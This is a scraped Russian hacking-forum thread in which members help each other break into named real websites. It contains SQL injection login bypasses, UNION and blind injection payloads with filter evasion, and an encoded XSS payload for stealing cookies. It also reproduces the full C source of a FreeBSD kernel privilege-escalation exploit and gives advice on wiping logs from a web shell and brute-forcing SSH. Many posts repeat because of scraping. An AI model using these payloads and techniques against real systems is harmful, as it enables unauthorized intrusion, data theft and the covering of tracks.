User-agent: *
Disallow:
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-9820509-1");
pageTracker._trackPageview();
} catch(err) {}</script>

=====
Расшифруйте, пожалуйста файл robot.txt )) Можно ли из этого извлеч что-то полезное ?

ни то ни другое не помогло =(

попробуй hex(password)
Может это бинарное представление хеша, посчитай количество знаков в хексвиде

User-agent: *
Disallow:
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-9820509-1");
pageTracker._trackPageview();
} catch(err) {}</script>

=====
Расшифруйте, пожалуйста файл robot.txt )) Можно ли из этого извлеч что-то полезное ?

Ты наверное имел в виду robots.txt

Но это не файл роботс ткст, это гугловский яваскрипт код для отследивания статистики посещаимости, хз что он делает в robots.txt, этот код должен вставлятся в тело страницы.

ни то ни другое не помогло =(

mailbrush, проблема в то что пароль вывоидтся криво ©5ÇoêÉ-:
А ты не мог подумать о том, что это и есть шифровка пароля? GZ например, или что-то другое...?

Пример такой шифровки (писал на скорую руку):
<?php
$password = 'mysecretpassword';

for($i=0;$i<=strlen($password)-1;$i++)
{
echo chr(ord($password[$i])+64);
}
?>
выведет №іҐЈІҐґ°Ўіі·ЇІ¤.

ИСПАНЦИ ТОЖЕ МОШЕННИКИ,
Вобщем дело такое (живу в Испании) на мое мыло приходит письмо бла бла бла вас выбрали из фигзнает скольких пользователей- вобщем примите в подарок мерс))) мне стало интересно))) ссылка ведет на форму http://www.aldaniti.net/wingames/mercedes/index.php?&
где мы видем что необходимо отправить свои данные (ФИО телефон адрес и т д)
дальше идем по ссылке http://www.aldaniti.net и что мы видем? (для тех кто незнаком с Испанским- они предлагают в аренду БД клиентов где они описывают что есть все необходимые данные (ФИО , мыло, адрес,телефон и т д) пишут гады что база содержит более 6 миллионов, что мы делаем? идем на страницу авторизации, вводим левый емайл и в качестве пасса
' or 1=1 на что нам выдает следующую ошибку
http://s43.radikal.ru/i099/0909/7b/af1753edeb00.jpg
вопрос в следующем (не подумайте что из-за мерса обиделся)))) что из этого можно выжать?)))

Инъекция у тебя :)
Дай ссылку, а то на изображении нечетко видно.

http://www.aldaniti.net/scripts/valida.phpИнъекция у тебя :)
Дай ссылку, а то на изображении нечетко видно.

На форму :)
т.е. ссылку на то, где ты вводишь свои данные.

На индексе форма входа висит.

ссылка ведет на форму http://www.aldaniti.net/wingames/mercedes/index.php?&
где мы видем что необходимо отправить свои данные (ФИО телефон адрес и т д)
о_О, не видел этого :)

На индексе форма входа висит.Это немного не то :)

Сейчас попробую реализовать инъ.

Логин ' or 1=1/*@aa.fuck
Пароль что угодно

Хех, а ту инъекцию я так и не расскрутил. Не могу даже форму отправить, а рыться в сорсах как то не очень хочеться :)

я непойму- на форме входа у меня одного такое?

http://www.aldaniti.net/auten.php

http://i064.radikal.ru/0909/96/ffe79070d18d.jpg

я непойму- на форме входа у меня одного такое?

Логин ' or 1=1/*@aa.fuck Пароль что угодно
Вот так делай :)

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /help/
Disallow: /images/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/
Disallow: /templates/
Disallow: /installation/
Disallow: /pub/

=======
Есть robots.txt на сервере.... Почему не заходит в данные каталоги по запросу ??? Скажите, пожалуйста ?

1. Их может не быть. Я тоже могу в роботсы прописать хрень вякую
2. Ссылка http://site.ru/administrator отличается во многих случаях от http://site.ru/administrator/ - разницу найди сам
3. Что значит " Почему не заходит в данные каталоги по запросу "? пишет forbidden - каталог есть, но стоит .htaccess соответсвующий, с веба не посмотришь

24free
есть много причин,мб прав нет.
знаешь так делают:
index.php: <?php define('inside', True);
library.php: <?php if (! defined('inside')) die('Access denied');
что бы не вызывались файлы напрямую.

это жумла\мамба, там во всех папках index.html пустой

Спасибо за инфу!

_http://www.xakep.ru/post/49508/default.asp

В самом начале про протокол DATA.У кого-нибудь это работает? У меня даже такой директивы в php.ini allow_url_include нету.После того,как прописал,тоже ничего не изменилось.

перезапустить апач нужно

_http://www.xakep.ru/post/49508/default.asp

В самом начале про протокол DATA.У кого-нибудь это работает? У меня даже такой директивы в php.ini allow_url_include нету.После того,как прописал,тоже ничего не изменилось.
(php>=5.2.0 - именно с этой версии включена поддержка data и других протоколов)
...

...
Да ему поxуй вообще, он по 10% читает.

Здравствуйте уважаемые Гуру, у меня возник один сложный для меня, но возможно вполне простой для вас вопрос
http://site.ru/news/19/08/2009/603-1/
Гребаные ЧПУ, ненавижу их, но суть не в этом. С -1 все правильно работает, т.е. инъекция есть. если поставить /news/19/08/2009/603+--/ ругается на + страшными словами(если без + то все ровно):
Incorrect syntax near '+'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near '+'.
Source Error:

Line 144: SqlDataAdapter adp = new SqlDataAdapter(q, myConn);
Line 145: dt = new DataTable();
Line 146: adp.Fill(dt);
Line 147: myConn.Close();
Line 148: break;
Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082
С MSsql я, скажем так, знаком только отдаленно(кстати не факт что mssql), но мануалы читал, однако что-то в голову никаких мыслей не пришло, единственное что опытным путем удалось установить что этот параметр в запросе самый последний после 603 идет ;
Кстати если вместо + в предыдущем запросе поставить пробел ругается абсолютно точно также. Если /news/19/08/2009/603;--/ то ругается Incorrect syntax near 'b'. Нужен ваш совет что делать дальше, какие конструкции попробовать, устроил бы даже посимвольный перебор содержимого БД.

Вместо плюса используй:
(пробел)
/**/
%09
%0A
%0D

a kakie bugi v dle scripte pojalusta??

http://forum.antichat.ru/thread52195.html

Может не в ту тему я попал, извиняйте меня :)
Кто может скомпилировать ?

/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here:
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0.
*
* Enjoy, and happy holidays!
* - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/

#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e

typedef unsigned long ulong;
typedef unsigned char uchar;

int
x(void)
{
struct proc * p = (struct proc * )PATTERN1;
uint * i;

while(1)
{
if(p->p_pid == PATTERN2)
{
i = (uint * )p->p_ucred;
*++i = 0;
break;
}

p = p->p_list.le_next;
}

return 1;
}

int
main(int argc, char * argv[])
{
ulong addr;
uchar * c;
uchar * d;
uint * i;
void * v;
int pid;
int s;

if(argc != 2)
{
fprintf(stderr, "usage: ./x <allproc>\n");
return 1;
}

addr = strtoul(argv[1], 0, 0);

v = mmap(
NULL,
(PAGES*PAGE_SIZE),
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_ANON|MAP_FIXED,
-1,
0);
if(v == MAP_FAILED)
{
perror("mmap");
return 0;
}

c = v;
d = (uchar * )x;
while(1)
{
*c = *d;
if(*d == 0xc3)
{
break;
}

d++;
c++;
}

*c++ = 0xc3;

c = v;
while(1)
{
if(*(long * )c == PATTERN1)
{
*(c + 0) = addr >> 0;
*(c + 1) = addr >> 8;
*(c + 2) = addr >> 16;
*(c + 3) = addr >> 24;
break;
}
c++;
}

pid = getpid();
while(1)
{
if(*(long * )c == PATTERN2)
{
*(c + 0) = pid >> 0;
*(c + 1) = pid >> 8;
*(c + 2) = pid >> 16;
*(c + 3) = pid >> 24;
break;
}
c++;
}

s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
if(s < 0)
{
perror("socket");
return 1;
}

shutdown(s, SHUT_RDWR);

return 0;
}

А то у меня не получается

uid=1000(web) gid=1000(web) groups=1000(web


У меня достаточно прав для чистки логов?
Если да то что за собой нужно чистить?

uid=1000(web) gid=1000(web) groups=1000(web


У меня достаточно прав для чистки логов?
Если да то что за собой нужно чистить?
Не не хватит, тебе нужны прова рута, дя чтение и записи файлов
Ищи сплойт для подняите прав

Не не хватит, тебе нужны прова рута, дя чтение и записи файлов
Ищи сплойт для подняите прав

Больше интересует 2 вопрос, про то какие логи надо подтерать

Больше интересует 2 вопрос, про то какие логи надо подтерать
попробуй тулзу vanish2 , оно автоматом почистит.

Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?

попробуй тулзу vanish2 , оно автоматом почистит.
Я из под WEB-шелла сижу.
Нужно почистить логи он SQL-inj тоесть от ерроров

Я из под WEB-шелла сижу.
Нужно почистить логи он SQL-inj тоесть от ерроров

http://forum.antichat.net/threadnav49775-1-10.html

тут посмари где лежат логи и по логике ищи

Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?

На ачате уже много раз обсуждалось. Создавай картинку с помощью js.

mailbrush я не понял? Можешь вделить то место на коде javascripta, куда нужно поставить код сниффера или сам постав код сниффера, а я сам догадаюсь уже.

Это краткое описание уязвимостей php.

Сообщение от Cehennem
Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?

Ну никто не ответит? Я знаю что для вас не трудно. Если не помешает поставьте из любого сниффера код в javascript xss, а потом я пойму.

плизззззззззз

Есть удаленный хост с открым 22 портом. На нем висит SSH2.0-OpenSSH_4.3. Хотелось бы найти возможность удаленно управлять. Искал на милворм, нашел только на Denial, да и он не сработал... Испытывал на cygwin.
Есть еще варианты?

2Cehennem ветка чуть ниже "XSS для чайников" , только чтоб работало переводиш в чар как ты в своем примере показывал.

2cristoff брут или ищи другие баги на серваке.

magic_quotes или addslashes будут мешать тильде `?

magic_quotes или addslashes будут мешать тильде `?
нет

Доброго времени суток всем уважаемым!

Подскажите плз, как можно обойти фильтрацию ',' (запятая) в sql при выполнении запросов типа

userid=10+UNION+SELECT+1,2,3,4,5,6/*
и
userid=10+and+ASCII(SUBSTRING(user(),1,1))>0/*

Заранее всем благодарен

Если обычный str_replace - никак запятую не поставишь.
Но я думаю, можно одним способом, который я сейчас проверю.

жду

Нет, нельзя :)
Я думал с хексом поиграть, но ничего не вышло...

Доброго времени суток всем уважаемым!

Подскажите плз, как можно обойти фильтрацию ',' (запятая) в sql при выполнении запросов типа

userid=10+UNION+SELECT+1,2,3,4,5,6/*
и
userid=10+and+ASCII(SUBSTRING(user(),1,1))>0/*

Заранее всем благодарен

В слепых скулях можно юзать так:

userid=10+and+ASCII(SUBSTRING(user() FROM 1 FOR 1))>0/*

первое - с какого символа, второе - сколько символов

Единственная накладка - в выборке с лимитом нужна запятая, но можно обойтись, к примеру этим where id = 1 и т.д.

Еще вопросик.
Может кто сталкивался с HELM - управление доменнами, хостом etc

так вот вопрос - как расшифровать хеши?

Сам хеш - 61F3ADC9E4F1D793B2614ACD1B3B7332C0730E461C395DCDB1 C846784C6B00BC
Соответствует паролю 558dd-dd

Так же имеется файл, который как мне кажется и криптует все это

<SCRIPT LANGUAGE=JScript RUNAT=SERVER>

/*
* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 1.1 Copyright (C) Paul Johnston 1999 - 2002.
* Code also contributed by Greg Holt
* See http://pajhome.org.uk/site/legal.html for details.
*/

/*
* Add integers, wrapping at 2^32. This uses 16-bit operations internally
* to work around bugs in some JS interpreters.
*/
function safe_add(x, y)
{
var lsw = (x & 0xFFFF) + (y & 0xFFFF)
var msw = (x >> 16) + (y >> 16) + (lsw >> 16)
return (msw << 16) | (lsw & 0xFFFF)
}

/*
* Bitwise rotate a 32-bit number to the left.
*/
function rol(num, cnt)
{
return (num << cnt) | (num >>> (32 - cnt))
}

/*
* These functions implement the four basic operations the algorithm uses.
*/
function cmn(q, a, b, x, s, t)
{
return safe_add(rol(safe_add(safe_add(a, q), safe_add(x, t)), s), b)
}
function ff(a, b, c, d, x, s, t)
{
return cmn((b & c) | ((~b) & d), a, b, x, s, t)
}
function gg(a, b, c, d, x, s, t)
{
return cmn((b & d) | (c & (~d)), a, b, x, s, t)
}
function hh(a, b, c, d, x, s, t)
{
return cmn(b ^ c ^ d, a, b, x, s, t)
}
function ii(a, b, c, d, x, s, t)
{
return cmn(c ^ (b | (~d)), a, b, x, s, t)
}

/*
* Calculate the MD5 of an array of little-endian words, producing an array
* of little-endian words.
*/
function coreMD5(x)
{
var a = 1732584193
var b = -271733879
var c = -1732584194
var d = 271733878

for(i = 0; i < x.length; i += 16)
{
var olda = a
var oldb = b
var oldc = c
var oldd = d

a = ff(a, b, c, d, x[i+ 0], 7 , -680876936)
d = ff(d, a, b, c, x[i+ 1], 12, -389564586)
c = ff(c, d, a, b, x[i+ 2], 17, 606105819)
b = ff(b, c, d, a, x[i+ 3], 22, -1044525330)
a = ff(a, b, c, d, x[i+ 4], 7 , -176418897)
d = ff(d, a, b, c, x[i+ 5], 12, 1200080426)
c = ff(c, d, a, b, x[i+ 6], 17, -1473231341)
b = ff(b, c, d, a, x[i+ 7], 22, -45705983)
a = ff(a, b, c, d, x[i+ 8], 7 , 1770035416)
d = ff(d, a, b, c, x[i+ 9], 12, -1958414417)
c = ff(c, d, a, b, x[i+10], 17, -42063)
b = ff(b, c, d, a, x[i+11], 22, -1990404162)
a = ff(a, b, c, d, x[i+12], 7 , 1804603682)
d = ff(d, a, b, c, x[i+13], 12, -40341101)
c = ff(c, d, a, b, x[i+14], 17, -1502002290)
b = ff(b, c, d, a, x[i+15], 22, 1236535329)

a = gg(a, b, c, d, x[i+ 1], 5 , -165796510)
d = gg(d, a, b, c, x[i+ 6], 9 , -1069501632)
c = gg(c, d, a, b, x[i+11], 14, 643717713)
b = gg(b, c, d, a, x[i+ 0], 20, -373897302)
a = gg(a, b, c, d, x[i+ 5], 5 , -701558691)
d = gg(d, a, b, c, x[i+10], 9 , 38016083)
c = gg(c, d, a, b, x[i+15], 14, -660478335)
b = gg(b, c, d, a, x[i+ 4], 20, -405537848)
a = gg(a, b, c, d, x[i+ 9], 5 , 568446438)
d = gg(d, a, b, c, x[i+14], 9 , -1019803690)
c = gg(c, d, a, b, x[i+ 3], 14, -187363961)
b = gg(b, c, d, a, x[i+ 8], 20, 1163531501)
a = gg(a, b, c, d, x[i+13], 5 , -1444681467)
d = gg(d, a, b, c, x[i+ 2], 9 , -51403784)
c = gg(c, d, a, b, x[i+ 7], 14, 1735328473)
b = gg(b, c, d, a, x[i+12], 20, -1926607734)

a = hh(a, b, c, d, x[i+ 5], 4 , -378558)
d = hh(d, a, b, c, x[i+ 8], 11, -2022574463)
c = hh(c, d, a, b, x[i+11], 16, 1839030562)
b = hh(b, c, d, a, x[i+14], 23, -35309556)
a = hh(a, b, c, d, x[i+ 1], 4 , -1530992060)
d = hh(d, a, b, c, x[i+ 4], 11, 1272893353)
c = hh(c, d, a, b, x[i+ 7], 16, -155497632)
b = hh(b, c, d, a, x[i+10], 23, -1094730640)
a = hh(a, b, c, d, x[i+13], 4 , 681279174)
d = hh(d, a, b, c, x[i+ 0], 11, -358537222)
c = hh(c, d, a, b, x[i+ 3], 16, -722521979)
b = hh(b, c, d, a, x[i+ 6], 23, 76029189)
a = hh(a, b, c, d, x[i+ 9], 4 , -640364487)
d = hh(d, a, b, c, x[i+12], 11, -421815835)
c = hh(c, d, a, b, x[i+15], 16, 530742520)
b = hh(b, c, d, a, x[i+ 2], 23, -995338651)

a = ii(a, b, c, d, x[i+ 0], 6 , -198630844)
d = ii(d, a, b, c, x[i+ 7], 10, 1126891415)
c = ii(c, d, a, b, x[i+14], 15, -1416354905)
b = ii(b, c, d, a, x[i+ 5], 21, -57434055)
a = ii(a, b, c, d, x[i+12], 6 , 1700485571)
d = ii(d, a, b, c, x[i+ 3], 10, -1894986606)
c = ii(c, d, a, b, x[i+10], 15, -1051523)
b = ii(b, c, d, a, x[i+ 1], 21, -2054922799)
a = ii(a, b, c, d, x[i+ 8], 6 , 1873313359)
d = ii(d, a, b, c, x[i+15], 10, -30611744)
c = ii(c, d, a, b, x[i+ 6], 15, -1560198380)
b = ii(b, c, d, a, x[i+13], 21, 1309151649)
a = ii(a, b, c, d, x[i+ 4], 6 , -145523070)
d = ii(d, a, b, c, x[i+11], 10, -1120210379)
c = ii(c, d, a, b, x[i+ 2], 15, 718787259)
b = ii(b, c, d, a, x[i+ 9], 21, -343485551)

a = safe_add(a, olda)
b = safe_add(b, oldb)
c = safe_add(c, oldc)
d = safe_add(d, oldd)
}
return [a, b, c, d]
}

/*
* Convert an array of little-endian words to a hex string.
*/
function binl2hex(binarray)
{
var hex_tab = "0123456789abcdef"
var str = ""
for(var i = 0; i < binarray.length * 4; i++)
{
str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
hex_tab.charAt((binarray[i>>2] >> ((i%4)*8)) & 0xF)
}
return str
}

/*
* Convert an array of little-endian words to a base64 encoded string.
*/
function binl2b64(binarray)
{
var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwx yz0123456789+/"
var str = ""
for(var i = 0; i < binarray.length * 32; i += 6)
{
str += tab.charAt(((binarray[i>>5] << (i%32)) & 0x3F) |
((binarray[i>>5+1] >> (32-i%32)) & 0x3F))
}
return str
}

/*
* Convert an 8-bit character string to a sequence of 16-word blocks, stored
* as an array, and append appropriate padding for MD4/5 calculation.
* If any of the characters are >255, the high byte is silently ignored.
*/
function str2binl(str)
{
var nblk = ((str.length + 8) >> 6) + 1 // number of 16-word blocks
var blks = new Array(nblk * 16)
for(var i = 0; i < nblk * 16; i++) blks[i] = 0
for(var i = 0; i < str.length; i++)
blks[i>>2] |= (str.charCodeAt(i) & 0xFF) << ((i%4) * 8)
blks[i>>2] |= 0x80 << ((i%4) * 8)
blks[nblk*16-2] = str.length * 8
return blks
}

/*
* Convert a wide-character string to a sequence of 16-word blocks, stored as
* an array, and append appropriate padding for MD4/5 calculation.
*/
function strw2binl(str)
{
var nblk = ((str.length + 4) >> 5) + 1 // number of 16-word blocks
var blks = new Array(nblk * 16)
for(var i = 0; i < nblk * 16; i++) blks[i] = 0
for(var i = 0; i < str.length; i++)
blks[i>>1] |= str.charCodeAt(i) << ((i%2) * 16)
blks[i>>1] |= 0x80 << ((i%2) * 16)
blks[nblk*16-2] = str.length * 16
return blks
}

/*
* External interface
*/
function hexMD5 (str) { return binl2hex(coreMD5( str2binl(str))) }
function hexMD5w(str) { return binl2hex(coreMD5(strw2binl(str))) }
function b64MD5 (str) { return binl2b64(coreMD5( str2binl(str))) }
function b64MD5w(str) { return binl2b64(coreMD5(strw2binl(str))) }
/* Backward compatibility */
function calcMD5(str) { return binl2hex(coreMD5( str2binl(str))) }

</SCRIPT>


Если у кого получится рассшифровать или есть какие либо идеии - побеспокойте плз в асю
29ЧO78Ч26

TO GREY - ОГРОМНОЕ СПАСИБО - ПОЛУЧИЛОСЬ!!!!!!

Единственная накладка - в выборке с лимитом нужна запятая, но можно обойтись, к примеру этим where id = 1 и т.д. Там можно и без запятой, пример: LMIT 1 OFFSET 1

Добрый день уважаемые гуру, вот занялся изучением SQL-инъекций, не могу разобраться:
Делаю инъекции для определения имен таблиц:
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,TABLE_NAME,4,5,6,7+FROM+INFORM ATION_SCHEMA.TABLES+LIMIT+4,1
Все работает, перебирая limit нашел интересную табличку guest_book
Делаю так, чтоб узнать колонки:
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFOR MATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='guest_book '+LIMIT+1,1
НЕ работает !
Select_Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'guest_book\' LIMIT 1,1' at line 5SELECT `mar_news`.`news_date`, `mar_news`.`news_small_en`, `mar_news`.`news_big_en`, `mar_news`.`photo_alb_page_id`,`mar_news`.`file_en `,`mar_news`.`file_anchor_en`, `mar_news`.`category_name_id` FROM `mar_news` WHERE `mar_news`.`news_id` = -32 union select 1,2,COLUMN_NAME,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=\'guest_book\' LIMIT 1,1
Подскажите пожалуйста в чем загвоздка.

WHERE+TABLE_NAME=guest_book
Без '
Там же видно в чём ошибка.

Вообще то WHERE+TABLE_NAME=0x67756573745f626f6f6b, так как фильтруются кавычки, нужно либо хексить, либо чарить.

http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFOR MATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x677565737 45f626f6f6b+LIMIT+1,1

Ну и для удобства вот так:

http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,group_concat(COLUMN_NAME),4,5, 6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NA ME=0x67756573745f626f6f6b--+

Получаем:
guest_book_id,gb_name,gb_email,gb_date,gb_text,gb_ lang

Вот столкнулся, что и как дальше незнаю и можно ли из этого что то получить:

http://sk-kr.ru/

далее:
http://sk-kr.ru/index.php?id=2&cid=2
подставляя ' в любой из параметров получаем чистый экран, по запросу :

http://sk-kr.ru/index.php?id=2

получаем:

« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »

PHP error debug
Error: mysql_fetch_array(): supplied argument is not a valid MySQL result resource
Error type/ Nr.: Warning - 2
File: /home/b/bz23region/public_html/manager/includes/document.parser.class.inc.php(769) : eval()'d code
Line: 7

Parser timing
MySQL: 0.0058 s (23 Requests)
PHP: 0.0198 s
Total: 0.0256 s

собсно, можно ли провести инъекцию ?

собстно нет.
http://sk-kr.ru/index.php?id=2
Здесб баг в самом скрипте, вы не вызываете ошибку, она вызвана каким то драгим фактором.

экранирование кавычек
использую char(), hex() и тп

собсно, можно ли провести инъекцию ?
Нету в модексе скулей. Точнее есть, но как-бэ нет :) Во всяком случае в последнем.

В этих параметрах можешь даже и не пробовать

Нету в модексе скулей. Точнее есть, но как-бэ нет :) Во всяком случае в последнем.

В этих параметрах можешь даже и не пробовать
спасибо, покопаюсь дальше, надеюсь найду тайную дверцу в чрево сайта...
ведь я правильно понял : Точнее есть, но как-бэ нет что дырка есть но не в этом параметре, теперь буду пробовать из спортивного интереса.

спасибо, покопаюсь дальше, надеюсь найду тайную дверцу в чрево сайта...
ведь я правильно понял : Точнее есть, но как-бэ нет что дырка есть но не в этом параметре, теперь буду пробовать из спортивного интереса.
В таком случае рекоммендую скачать код. Просто так, удалённо замучаешься и врятли найдёшь.

Хотя эта версия не последняя, про неё точно сказать не могу

Провожу blind инъекцию первый раз,вначале узнал имя юзера таким запросом http://site/printerfriendlynews.php?newsid=1631+AND+ascii(lowe r(substring(user(),1,1)))>1
b и так до его имени,теперь как узнать его пароль?

Если ветка >= 5
если есть доступ к mysql,

то

SELECT password FROM mysql.user WHERE user=0x0000
где 0000 - имя твоего пользователя в хексе.

Неполучается,есть таблицы user

2Fed123, вашим запросом вы узнали текущего юзера базы данных.

Пробуйте так:
www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+u ser+from+user+LIMIT+1),1,1)))>1

www.site.com/index.php?id=1+AND+ascii(lower(substring((SELECT+p assword+from+mysql.user+WHERE+user="ВАШ ЮЗЕР"+LIMIT+1),1,1)))>1

Ну и так далее перебирайте.

Вопрос такой,есть шелл необходимо спарсить название папок
/юзер/папка/domain.com/
нужны название всех папок из путя,т.к у юзверей в разных папках домены лежат.
реверс по айпи не катит там,сеть айпи висит.
видел кто нить подобное?
руками не вариант

<pre>
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
@ignore_user_abort(1);

$l_folder = '/юзер/папка/domain.com'; // Полный абсолютный путь к папке

//Функция рекурсивного получения списка файлов и папок
function fold($rootDir, $allData=array()) {
$invisibleFileNames = array(".", "..");
$dirContent = scandir($rootDir);
foreach($dirContent as $key => $content) {
$path = $rootDir.'/'.$content;
if(!in_array($content, $invisibleFileNames)) {
if(is_file($path) && is_readable($path)) {
preg_match('|\/(.*)\/|',$path,$res);
$allData[0][] = $path;//Файлы
$allData[1][] = $res[0];//папки
}elseif(is_dir($path) && is_readable($path)) {
$allData = fold($path, $allData);
}
}
}
return $allData;
}

$b = fold($l_folder);
print_r($b);
?>
</pre>

Вопрос такой,есть шелл необходимо спарсить название папок
/юзер/папка/domain.com/
нужны название всех папок из путя,т.к у юзверей в разных папках домены лежат.
реверс по айпи не катит там,сеть айпи висит.
видел кто нить подобное?
руками не вариант
Если есть возможно выполнять команды, тогда:
find /юзер/папка/domain.com/ -type d
Если надо переходить по символическим ссылкам, тогда добавь -L
Пример:
$ find -L /tmp -type d
/tmp
/tmp/launch-2sW0uR
/tmp/launch-DM3FAL
/tmp/launch-DSlIgu
/tmp/launch-hrAmOc
/tmp/launchd-229.B1EiU1
/tmp/ssh-yqYA4n2bZI

Как в изображение встроить код?

